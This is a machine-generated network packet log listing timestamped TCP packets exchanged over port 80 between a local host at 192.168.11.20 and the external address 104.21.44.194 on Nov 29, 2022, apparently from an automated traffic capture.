                                                                          Nov 29, 2022 09:20:40.887739897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887767076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887789011 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887809038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887839079 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887840033 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.887840033 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.887840033 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.887840033 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.887856960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887881041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887897015 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887914896 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887947083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887967110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887995005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888011932 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888011932 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888011932 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888011932 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888011932 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888014078 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888045073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888066053 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888104916 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888139963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888160944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888180971 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888180971 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888180971 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888180971 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888199091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888219118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888254881 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888276100 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888320923 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888340950 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888340950 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888340950 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888360023 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888381958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888423920 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888461113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888484001 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888520002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888520002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888520002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888520956 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888562918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888587952 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888617039 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888628006 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888660908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888676882 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888689041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888710022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888720989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888731956 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888751030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888761997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888772964 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888782978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888789892 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888789892 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888789892 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888789892 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888789892 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888789892 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888803005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888813972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888824940 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888834953 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888858080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888868093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888879061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888890028 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888910055 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888920069 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888931036 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888941050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888962030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888967037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888967037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888967037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888967037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888967037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888967037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888972998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888983965 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888993979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889010906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889019966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889036894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889075994 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889096022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889108896 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889118910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889130116 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889132977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889132977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889141083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889151096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889162064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889172077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889180899 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889192104 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889202118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889211893 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889223099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889233112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889244080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889254093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889265060 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889275074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889286041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889296055 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889300108 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889300108 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889300108 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889300108 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889307022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889317989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889328003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889338970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889348984 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889364004 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889381886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889400959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889419079 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889430046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889441013 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889448881 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889448881 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889448881 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889448881 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889448881 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889448881 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889448881 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889451981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889462948 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889472961 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889482021 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889492989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889503956 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889513969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889524937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889534950 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889545918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889556885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889566898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889578104 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889589071 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889599085 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889616966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889617920 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889617920 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889617920 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889617920 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889617920 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889617920 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889617920 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889617920 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889630079 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889640093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889652967 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889669895 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889688969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889707088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889724970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889775991 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889775991 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889775991 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889775991 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889775991 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889775991 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889775991 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889970064 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889970064 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.891477108 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.891597033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.891850948 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.892024994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.902976036 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903084993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903098106 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903111935 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903130054 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903141975 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903187990 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.903235912 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903254986 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903306961 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903359890 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.903359890 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.903392076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903404951 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903424025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903436899 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903455973 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903493881 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903508902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903520107 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903522968 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.903522968 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.903522968 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.903522968 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.903522968 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.903537035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903548002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903558969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903601885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903613091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903624058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903642893 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903654099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903664112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903673887 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903692961 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903693914 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.903693914 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.903703928 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903714895 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903753996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903764963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903775930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903812885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903826952 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903862000 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903867006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.903867006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.903867006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.903867006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.903867006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.903867006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.903867006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.903873920 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903894901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903907061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903918982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903930902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903951883 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903964043 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903975010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903987885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.904015064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.904033899 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.904037952 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.904037952 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.904037952 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.904037952 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.904037952 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.904052973 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.904064894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.904202938 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.904202938 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.904365063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.904365063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.904365063 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.927484989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927531958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927599907 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927628040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927640915 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927651882 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927663088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927684069 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927695036 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927705050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927716017 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927736998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927747965 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927757978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927768946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927788019 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927798986 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927809954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927824974 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.927824974 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.927848101 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927859068 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927870035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927890062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927901030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927911997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927922010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927942038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927953959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927963972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927974939 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.927990913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.927990913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.927990913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.927990913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.927990913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.927990913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.927990913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.927990913 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.927997112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.928008080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.928018093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.928030014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.928050041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.928061008 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.928071976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.928091049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.928102016 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.928112030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.928122997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.928133965 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.928143978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.928154945 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.928160906 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.928160906 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.928160906 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.928160906 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.928160906 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.928164959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.928299904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.928299904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.928299904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.928299904 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.928499937 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.937591076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.937710047 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.937738895 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.937751055 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.937761068 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.937782049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.937793016 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.937803984 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.937814951 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.937841892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.937863111 CET8049852104.21.44.194192.168.11.20
